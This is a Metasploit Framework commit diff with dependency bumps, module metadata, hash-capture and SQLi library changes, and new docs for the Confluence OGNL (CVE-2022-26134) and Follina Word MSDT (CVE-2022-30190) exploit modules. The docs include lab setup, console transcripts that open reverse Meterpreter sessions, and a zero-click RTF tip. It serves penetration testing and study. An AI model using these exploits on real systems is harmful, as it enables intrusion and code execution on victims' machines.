Land #16662, Add faraday retry gem dependency

Net-NTLM (v1 and v2) hashes were being duplicated when
stored in the database due to the unique data in the challenge
dispite being the same. This fixes that issue

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.2.1)
+    metasploit-framework (6.2.2)
       actionpack (~> 6.0)
       activerecord (~> 6.0)
       activesupport (~> 6.0)
@@ -18,6 +18,7 @@ PATH
       eventmachine
       faker
       faraday
+      faraday-retry
       faye-websocket
       filesize
       hrr_rb_ssh-ed25519
@@ -29,7 +30,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.87)
+      metasploit-payloads (= 2.0.93)
       metasploit_data_models
       metasploit_payloads-mettle (= 1.0.18)
       mqtt
@@ -128,13 +129,13 @@ GEM
       activerecord (>= 3.1.0, < 8)
     ast (2.4.2)
     aws-eventstream (1.2.0)
-    aws-partitions (1.588.0)
-    aws-sdk-core (3.131.0)
+    aws-partitions (1.595.0)
+    aws-sdk-core (3.131.1)
       aws-eventstream (~> 1, >= 1.0.2)
       aws-partitions (~> 1, >= 1.525.0)
       aws-sigv4 (~> 1.1)
-      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.315.0)
+      jmespath (~> 1, >= 1.6.1)
+    aws-sdk-ec2 (1.317.0)
       aws-sdk-core (~> 3, >= 3.127.0)
       aws-sigv4 (~> 1.1)
     aws-sdk-iam (1.68.0)
@@ -185,28 +186,10 @@ GEM
       railties (>= 5.0.0)
     faker (2.21.0)
       i18n (>= 1.8.11, < 2)
-    faraday (1.10.0)
-      faraday-em_http (~> 1.0)
-      faraday-em_synchrony (~> 1.0)
-      faraday-excon (~> 1.1)
-      faraday-httpclient (~> 1.0)
-      faraday-multipart (~> 1.0)
-      faraday-net_http (~> 1.0)
-      faraday-net_http_persistent (~> 1.0)
-      faraday-patron (~> 1.0)
-      faraday-rack (~> 1.0)
-      faraday-retry (~> 1.0)
+    faraday (2.3.0)
+      faraday-net_http (~> 2.0)
       ruby2_keywords (>= 0.0.4)
-    faraday-em_http (1.0.0)
-    faraday-em_synchrony (1.0.0)
-    faraday-excon (1.1.0)
-    faraday-httpclient (1.0.1)
-    faraday-multipart (1.0.3)
-      multipart-post (>= 1.2, < 3)
-    faraday-net_http (1.0.1)
-    faraday-net_http_persistent (1.2.0)
-    faraday-patron (1.0.0)
-    faraday-rack (1.0.0)
+    faraday-net_http (2.0.3)
     faraday-retry (1.0.3)
     faye-websocket (0.11.1)
       eventmachine (>= 0.12.0)
@@ -224,7 +207,7 @@ GEM
     hrr_rb_ssh-ed25519 (0.4.2)
       ed25519 (~> 1.2)
       hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.4)
+    http-cookie (1.0.5)
       domain_name (~> 0.5)
     http_parser.rb (0.8.0)
     httpclient (2.8.3)
@@ -238,7 +221,7 @@ GEM
       rkelly-remix
     json (2.6.2)
     little-plugger (1.1.4)
-    logging (2.3.0)
+    logging (2.3.1)
       little-plugger (~> 1.1)
       multi_json (~> 1.14)
     loofah (2.18.0)
@@ -264,7 +247,7 @@ GEM
       activemodel (~> 6.0)
       activesupport (~> 6.0)
       railties (~> 6.0)
-    metasploit-payloads (2.0.87)
+    metasploit-payloads (2.0.93)
     metasploit_data_models (5.0.5)
       activerecord (~> 6.0)
       activesupport (~> 6.0)
@@ -280,9 +263,8 @@ GEM
     mini_portile2 (2.8.0)
     minitest (5.15.0)
     mqtt (0.5.0)
-    msgpack (1.5.1)
+    msgpack (1.5.2)
     multi_json (1.15.0)
-    multipart-post (2.1.1)
     mustermann (1.1.1)
       ruby2_keywords (~> 0.0.1)
     nessus_rest (0.1.6)
@@ -301,9 +283,9 @@ GEM
       mini_portile2 (~> 2.8.0)
       racc (~> 1.4)
     nori (2.6.0)
-    octokit (4.22.0)
-      faraday (>= 0.9)
-      sawyer (~> 0.8.0, >= 0.5.3)
+    octokit (4.23.0)
+      faraday (>= 1, < 3)
+      sawyer (~> 0.9)
     openssl-ccm (1.2.2)
     openssl-cmac (2.0.1)
     openvas-omp (0.0.4)
@@ -331,7 +313,7 @@ GEM
     puma (5.6.4)
       nio4r (~> 2.0)
     racc (1.6.0)
-    rack (2.2.3)
+    rack (2.2.3.1)
     rack-protection (2.2.0)
       rack
     rack-test (1.1.0)
@@ -353,7 +335,7 @@ GEM
     recog (2.3.23)
       nokogiri
     redcarpet (3.5.1)
-    regexp_parser (2.4.0)
+    regexp_parser (2.5.0)
     reline (0.2.5)
       io-console (~> 0.5)
     rex-arch (0.1.14)
@@ -429,13 +411,13 @@ GEM
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
     rspec-support (3.11.0)
-    rubocop (1.29.1)
+    rubocop (1.30.0)
       parallel (~> 1.10)
       parser (>= 3.1.0.0)
       rainbow (>= 2.2.2, < 4.0)
       regexp_parser (>= 1.8, < 3.0)
       rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.17.0, < 2.0)
+      rubocop-ast (>= 1.18.0, < 2.0)
       ruby-progressbar (~> 1.7)
       unicode-display_width (>= 1.4.0, < 3.0)
     rubocop-ast (1.18.0)
@@ -453,9 +435,9 @@ GEM
       windows_error (>= 0.1.4)
     rubyntlm (0.6.3)
     rubyzip (2.3.2)
-    sawyer (0.8.2)
+    sawyer (0.9.1)
       addressable (>= 2.3.5)
-      faraday (> 0.8, < 2.0)
+      faraday (>= 0.17.3, < 3)
     simplecov (0.18.2)
       docile (~> 1.1)
       simplecov-html (~> 0.11)
@@ -477,7 +459,7 @@ GEM
     thor (1.2.1)
     tilt (2.0.10)
     timecop (0.9.5)
-    timeout (0.2.0)
+    timeout (0.3.0)
     ttfunk (1.7.0)
     tzinfo (2.0.4)
       concurrent-ruby (~> 1.0)
@@ -485,7 +467,7 @@ GEM
       tzinfo (>= 1.0.0)
     unf (0.1.4)
       unf_ext
-    unf_ext (0.0.8.1)
+    unf_ext (0.0.8.2)
     unicode-display_width (2.1.0)
     unix-crypt (1.3.0)
     warden (1.2.9)
@@ -510,7 +492,7 @@ GEM
       activesupport (>= 4.2, < 8.0)
     xmlrpc (0.3.2)
       webrick
-    yard (0.9.27)
+    yard (0.9.28)
       webrick (~> 1.7.0)
     zeitwerk (2.5.4)
 

LICENSE_GEMS

@@ -78,7 +78,7 @@ memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.4, "New BSD"
 metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.1, "New BSD"
+metasploit-framework, 6.2.2, "New BSD"
 metasploit-model, 4.0.4, "New BSD"
 metasploit-payloads, 2.0.87, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"

db/modules_metadata_base.json

@@ -18715,7 +18715,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2022-05-16 12:03:24 +0000",
+    "mod_time": "2022-06-08 11:53:42 +0000",
     "path": "/modules/auxiliary/gather/impersonate_ssl.rb",
     "is_install_path": true,
     "ref_name": "gather/impersonate_ssl",
@@ -49779,7 +49779,7 @@
       "agalway-r7",
       "sjanusz-r7"
     ],
-    "description": "This module provides a SMB service that can be used to capture the challenge-response\n        password NTLMv1 & NTLMv2 hashes used with SMB1, SMB2, or SMB3 client systems.\n        Responses sent by this service have by default a random 8 byte challenge string\n        of format `\\x11\\x22\\x33\\x44\\x55\\x66\\x77\\x88`, allowing for easy cracking using\n        Cain & Abel (NTLMv1) or John the ripper (with jumbo patch).\n\n        To exploit this, the target system must try to authenticate to this\n        module. One way to force an SMB authentication attempt is by embedding\n        a UNC path (\\\\SERVER\\SHARE) into a web page or email message. When\n        the victim views the web page or email, their system will\n        automatically connect to the server specified in the UNC share (the IP\n        address of the system running this module) and attempt to\n        authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to\n        respond to queries for names the victim is already looking for.\n\n        Documentation of the above spoofing methods can be found by running `info -d`.",
+    "description": "This module provides a SMB service that can be used to capture the challenge-response\n        password NTLMv1 & NTLMv2 hashes used with SMB1, SMB2, or SMB3 client systems.\n        Responses sent by this service by default use a random 8 byte challenge string.\n        A specific value (such as `1122334455667788`) can be set using the CHALLENGE option,\n        allowing for easy cracking using Cain & Abel (NTLMv1) or John the Ripper\n        (with jumbo patch).\n\n        To exploit this, the target system must try to authenticate to this\n        module. One way to force an SMB authentication attempt is by embedding\n        a UNC path (\\\\SERVER\\SHARE) into a web page or email message. When\n        the victim views the web page or email, their system will\n        automatically connect to the server specified in the UNC share (the IP\n        address of the system running this module) and attempt to\n        authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to\n        respond to queries for names the victim is already looking for.\n\n        Documentation of the above spoofing methods can be found by running `info -d`.",
     "references": [
 
     ],
@@ -49793,7 +49793,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2022-04-21 11:24:15 +0000",
+    "mod_time": "2022-05-27 14:41:06 +0000",
     "path": "/modules/auxiliary/server/capture/smb.rb",
     "is_install_path": true,
     "ref_name": "server/capture/smb",
@@ -80542,6 +80542,73 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_multi/http/atlassian_confluence_namespace_ognl_injection": {
+    "name": "Atlassian Confluence Namespace OGNL Injection",
+    "fullname": "exploit/multi/http/atlassian_confluence_namespace_ognl_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-02",
+    "type": "exploit",
+    "author": [
+      "Unknown",
+      "bturner-r7",
+      "jbaines-r7",
+      "Spencer McIntyre"
+    ],
+    "description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n          evaluate an OGNL expression resulting in OS command execution.",
+    "references": [
+      "CVE-2021-26084",
+      "URL-https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro",
+      "URL-https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py",
+      "URL-https://github.com/jbaines-r7/through_the_wire",
+      "URL-https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-06-06 22:03:21 +0000",
+    "path": "/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/atlassian_confluence_namespace_ognl_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/http/atlassian_confluence_webwork_ognl_injection": {
     "name": "Atlassian Confluence WebWork OGNL Injection",
     "fullname": "exploit/multi/http/atlassian_confluence_webwork_ognl_injection",
@@ -87437,7 +87504,7 @@
       "PHP",
       "Shell Command"
     ],
-    "mod_time": "2021-11-23 07:58:07 +0000",
+    "mod_time": "2022-06-03 11:23:53 +0000",
     "path": "/modules/exploits/multi/http/php_fpm_rce.rb",
     "is_install_path": true,
     "ref_name": "multi/http/php_fpm_rce",
@@ -132409,6 +132476,66 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_windows/fileformat/word_msdtjs_rce": {
+    "name": "Microsoft Office Word MSDTJS",
+    "fullname": "exploit/windows/fileformat/word_msdtjs_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-29",
+    "type": "exploit",
+    "author": [
+      "nao sec",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n          feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.",
+    "references": [
+      "CVE-2022-30190",
+      "URL-https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/",
+      "URL-https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19",
+      "URL-https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+      "URL-https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
+      "URL-https://twitter.com/GossiTheDog/status/1531608245009367040",
+      "URL-https://github.com/JMousqueton/PoC-CVE-2022-30190"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Microsoft Office Word"
+    ],
+    "mod_time": "2022-06-02 00:58:20 +0000",
+    "path": "/modules/exploits/windows/fileformat/word_msdtjs_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/word_msdtjs_rce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Follina"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_windows/fileformat/word_mshtml_rce": {
     "name": "Microsoft Office Word Malicious MSHTML RCE",
     "fullname": "exploit/windows/fileformat/word_mshtml_rce",
@@ -186757,7 +186884,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-04-13 13:09:00 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
     "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "php/meterpreter_reverse_tcp",
@@ -187135,7 +187262,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_bind_tcp",
@@ -187169,7 +187296,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_reverse_http",
@@ -187203,7 +187330,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_reverse_https",
@@ -187237,7 +187364,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_reverse_tcp",
@@ -190134,7 +190261,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_bind_named_pipe",
@@ -190170,7 +190297,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_bind_tcp",
@@ -190206,7 +190333,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_reverse_http",
@@ -190242,7 +190369,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_reverse_https",
@@ -190278,7 +190405,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -190314,7 +190441,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_reverse_tcp",

documentation/modules/auxiliary/server/capture/smb.md

@@ -26,6 +26,8 @@ A file to store Cain & Abel formatted captured hashes in. Only supports NTLMv1 H
 
 The 8 byte server challenge. If unset or not a valid 16 character hexadecimal pattern, a random challenge is used instead.
 
+The format is `1122334455667788`.
+
 **JOHNPWFILE**
 
 A file to store John the Ripper formatted hashes in. NTLMv1 and NTLMv2 hashes will be stored in separate files.

documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md

@@ -0,0 +1,90 @@
+## Vulnerable Application
+This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate
+an OGNL expression resulting in OS command execution.
+
+Confluence versions up to and including 7.18 are vulnerable to this OGNL injection flaw. For more complete information
+on affected and fixed versions, see [CONFSERVER-79000][1].
+
+### Setup
+
+1. Create a new `docker-compose.yml` file with the contents below.
+2. Startup the container using `docker-compose up`
+3. Navigate to the HTTP service running on port 8090
+4. Acquire and provide an evaluation license
+5. When prompted, setup a standalone / non-clustered system
+6. Configure the database settings
+    1. Select "By connection string", then Database URL: `jdbc:postgresql://postgresql:5432/confdb`
+    2. Username and password are both `confdb`
+7. Setup takes a few minutes
+8. When prompted, select "Empty Site"
+9. Select "Manage users and groups within Confluence"
+10. Create an account, it **will not** be needed for exploitation
+11. Once setup has completed select "Start" and set a space name to something
+
+#### Docker Compose File
+
+```
+version: '3'
+
+services:
+  postgresql:
+    image: postgres:11
+    environment:
+      POSTGRES_DB: confdb
+      POSTGRES_USER: confdb
+      POSTGRES_PASSWORD: confdb
+    ports:
+      - '5432:5432'
+
+  confluence-server:
+    depends_on:
+      - postgresql
+    image: atlassian/confluence:7.13.0
+    ports:
+      - '8090:8090'
+      - '8091:8091'
+```
+
+## Verification Steps
+
+1. Follow the steps from the Setup section to create a test instance
+2. Start msfconsole
+3. Run: `use exploit/multi/http/atlassian_confluence_namespace_ognl_injection`
+4. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+5. Run the module
+
+## Options
+
+## Scenarios
+
+### Confluence 7.13.0 in [Docker]
+
+```
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.100
+RHOSTS => 192.168.159.100
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
+[+] 192.168.159.100:8090 - The target is vulnerable. Successfully tested OGNL injection.
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (40132 bytes) to 192.168.159.100
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:42050) at 2022-06-03 17:14:41 -0400
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > sysinfo
+Computer        : 5052c5eebf8a
+OS              : Linux 5.15.0-35-generic #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+[1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro

documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md

@@ -0,0 +1,98 @@
+There exists a vulnerability in Microsoft Word that leverages the remote template feature to achieveremote code execution against the target.
+
+The vulnerability came to light after an independent cybersecurity research team known as `nao_sec` uncovered a Word document ([05-2022-0438.doc](https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/)) that was uploaded to VirusTotal from an IP address in Belarus.
+
+The document uses the remote template feature to fetch an `HTML` document and then uses the `ms-msdt` scheme to execute `PowerShell` code.
+
+## Vulnerable Application
+
+The vulnerability has been proved in Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365. It also applies to Windows itself, e.g. it can be called from `.lnk` files and with `wget` into `PowerShell`.
+
+The vulnerability appears exploitable using `.RTF` files on all versions of Office 365, including current channel.
+
+However, with Insider and Current builds of Office, it doesn't seem to work.
+
+### Make your lab
+
+You need official version of Microsoft Office installed. And stay unpatched for this.
+
+Tested on Microsoft Windows 10 1909 w/ Microsoft Office Word 2016.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/windows/fileformat/word_msdtjs_rce`
+3. `set SRVHOST [IP]`
+4. `set LHOST [IP]`
+5. `run`
+
+## Options
+
+**CUSTOMTEMPLATE**
+
+A DOCX file that will be used as a template to build the exploit.
+
+**OBFUSCATE**
+
+Obfuscate JavaScript content. Default: true
+
+## Scenarios
+
+### Basic use
+
+1. Generate the exploit as following.
+
+```
+[*] Started reverse TCP handler on 172.20.32.36:4444 
+[*] Using URL: http://172.20.32.36:8080/1GWqOqp7e1
+[*] Server started.
+[*] Generate a malicious docx file
+[*] Using template '/tmp/payload.docx'
+[*] Parsing item from template: docProps/
+[*] Parsing item from template: docProps/core.xml
+[*] Parsing item from template: docProps/app.xml
+[*] Parsing item from template: word/
+[*] Parsing item from template: word/theme/
+[*] Parsing item from template: word/theme/theme1.xml
+[*] Parsing item from template: word/styles.xml
+[*] Parsing item from template: word/settings.xml
+[*] Parsing item from template: word/document.xml
+[*] Parsing item from template: word/_rels/
+[*] Parsing item from template: word/_rels/document.xml.rels
+[*] Parsing item from template: word/fontTable.xml
+[*] Parsing item from template: word/webSettings.xml
+[*] Parsing item from template: _rels/
+[*] Parsing item from template: _rels/.rels
+[*] Parsing item from template: [Content_Types].xml
+[*] Injecting payload in docx document
+[*] Finalizing docx 'msf.docx'
+[+] msf.docx stored at /home/[REDACTED]/.msf4/local/msf.docx
+[*] Powershell command length: 3724
+```
+
+2. Open the DOCX document on a remote vulnerable system.
+
+```
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending PowerShell Payload
+[*] Sending stage (200262 bytes) to 172.20.32.36
+[*] Meterpreter session 1 opened (172.20.32.36:4444 -> 172.20.32.36:42674 ) at 2022-05-30 19:32:37 +0400
+```
+
+### The 0-Click tip
+
+You can get the 0-click by converting, manually, the `.docx` file generated by the module into a `.rtf` file format.
+
+## References
+
+  1. <https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/>
+  2. <https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19>
+  3. <https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/>
+  4. <https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>
+  5. <https://twitter.com/GossiTheDog/status/1531608245009367040>
+  6. <https://github.com/JMousqueton/PoC-CVE-2022-30190>

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "6.2.1"
+      VERSION = "6.2.2"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/exploit/remote/ipv6.rb

@@ -252,12 +252,14 @@ module Exploit::Remote::Ipv6
   # which is from DDniele Belluci
   def ipv6_soll_mcast_addr6(addr)
     h = addr.split(':')[-2, 2]
-    m = []
-    m << 'ff'
-    m << (h[0].to_i(16) & 0xff).to_s(16)
-    m << ((h[1].to_i(16) & (0xff << 8)) >> 8).to_s(16)
-    m << (h[1].to_i(16) & 0xff).to_s(16)
-    'ff02::1:' + [m[0,2].join, m[2,2].join].join(':')
+    m = []  
+    x = h[0]
+    x[0..1] = 'ff'
+    m << x
+    x = h[1]
+    x.sub!(/^0*/, "")
+    m << x
+    'ff02::1:' + m.join(':')
   end
 
   # From Jon Hart's Racket::L3::Misc#soll_mcast_mac()

lib/msf/core/exploit/remote/smb/server/hash_capture.rb

@@ -56,13 +56,7 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
 
     return if hash_type.nil?
 
-    # TODO: write method for mapping +major+ and +minor+ OS values to human-readable OS names.
-    # client_os_version = ::NTLM::OSVersion.read(type1_msg.os_version)
-    print_line "[SMB] #{hash_type} Client     : #{address}"
-    # print_line "[SMB] #{hash_type} Client OS  : #{client_os_version}"
-    print_line "[SMB] #{hash_type} Username   : #{domain}\\#{user}"
-    print_line "[SMB] #{hash_type} Hash       : #{combined_hash}"
-    print_line
+    jtr_format = ntlm_message.ntlm_version == :ntlmv1 ? JTR_NTLMV1 : JTR_NTLMV2
 
     if active_db?
       origin = create_credential_origin_service(
@@ -103,9 +97,30 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
       # found_host.os_name = credential_options[:client_os_version]
       # found_host.save!
 
+      search_options = {
+        realm: credential_options[:realm_value],
+        user: credential_options[:username],
+        hosts: credential_options[:address],
+        jtr_format: credential_options[:jtr_format],
+        type: Metasploit::Credential::NonreplayableHash,
+        workspace: framework.db.workspace
+      }
+      if framework.db.creds(search_options).count > 0
+        vprint_status("Skipping previously captured hash for #{credential_options[:realm_value]}\\#{credential_options[:username]}")
+        return
+      end
+
       create_credential(credential_options)
     end
 
+    # TODO: write method for mapping +major+ and +minor+ OS values to human-readable OS names.
+    # client_os_version = ::NTLM::OSVersion.read(type1_msg.os_version)
+    print_line "[SMB] #{hash_type} Client     : #{address}"
+    # print_line "[SMB] #{hash_type} Client OS  : #{client_os_version}"
+    print_line "[SMB] #{hash_type} Username   : #{domain}\\#{user}"
+    print_line "[SMB] #{hash_type} Hash       : #{combined_hash}"
+    print_line
+
     if datastore['JOHNPWFILE']
       path = build_jtr_file_name(jtr_format)
 

lib/msf/core/exploit/sqli/mssqli/common.rb

@@ -182,7 +182,11 @@ module Msf::Exploit::SQLi::Mssqli
     def test_vulnerable
       random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
       random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
-      run_sql("select '#{random_string}'") == random_string
+      query_string = "'#{random_string}'"
+      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
+      output = run_sql("select #{query_string}")
+      return false if output.nil?
+      (@encoder ? @encoder[:decode].call(output) : output) == random_string
     end
 
     #

lib/msf/core/exploit/sqli/mysqli/common.rb

@@ -197,7 +197,11 @@ module Msf::Exploit::SQLi::MySQLi
     def test_vulnerable
       random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
       random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
-      run_sql("select '#{random_string}'") == random_string
+      query_string = "'#{random_string}'"
+      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
+      output = run_sql("select #{query_string}")
+      return false if output.nil?
+      (@encoder ? @encoder[:decode].call(output) : output) == random_string
     end
 
     #

lib/msf/core/exploit/sqli/postgresqli/common.rb

@@ -189,7 +189,11 @@ module Msf::Exploit::SQLi::PostgreSQLi
     def test_vulnerable
       random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
       random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
-      run_sql("select '#{random_string}'") == random_string
+      query_string = "'#{random_string}'"
+      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
+      output = run_sql("select #{query_string}")
+      return false if output.nil?
+      (@encoder ? @encoder[:decode].call(output) : output) == random_string
     end
 
     #

lib/msf/core/exploit/sqli/sqlitei/common.rb

@@ -146,6 +146,7 @@ module Msf::Exploit::SQLi::SQLitei
       query_string = "'#{random_string}'"
